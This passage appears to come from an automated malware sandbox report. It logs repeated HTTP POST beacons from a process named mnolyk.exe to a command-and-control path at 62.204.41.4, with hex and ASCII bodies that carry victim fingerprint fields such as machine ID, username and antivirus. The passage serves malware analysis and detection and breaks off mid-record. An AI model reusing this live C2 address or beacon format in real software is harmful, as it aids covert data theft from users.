                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.507123947 CET400INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            212192.168.2.44990762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:26.684813023 CET401OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.748305082 CET401INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            213192.168.2.44990862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:26.928554058 CET402OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.993206024 CET402INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            214192.168.2.44990962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:27.165241957 CET403OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:27.231302023 CET403INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            215192.168.2.44991062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:27.414675951 CET404OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:27.479623079 CET404INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            216192.168.2.44991162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:27.650449038 CET405OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:27.715866089 CET405INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            217192.168.2.44991262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:27.898909092 CET406OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:27.962352991 CET406INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            218192.168.2.44991362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:28.132055044 CET407OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:28.199865103 CET407INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            219192.168.2.44991462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:28.388086081 CET408OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:28.453757048 CET408INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            22192.168.2.44971762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:29.811372995 CET211OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:29.876492977 CET211INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            220192.168.2.44991562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:28.630925894 CET409OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:28.694411993 CET409INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            221192.168.2.44991662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:28.865859032 CET410OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:28.930334091 CET410INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            222192.168.2.44991762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:29.103689909 CET411OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:29.167716026 CET411INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            223192.168.2.44991862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:29.354199886 CET412OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:29.415900946 CET412INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            224192.168.2.44991962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:29.584682941 CET413OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:29.649487019 CET413INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            225192.168.2.44992062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:29.819519043 CET414OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:29.882147074 CET414INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            226192.168.2.44992162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:30.054351091 CET415OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:30.119349003 CET415INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            227192.168.2.44992262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:30.286333084 CET416OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:30.349036932 CET416INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            228192.168.2.44992362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:30.522432089 CET417OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:30.588219881 CET417INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            229192.168.2.44992462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:30.980932951 CET418OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:31.048573017 CET418INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            23192.168.2.44971862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:30.060142994 CET212OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:30.126377106 CET212INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            230192.168.2.44992562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:31.225193977 CET419OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
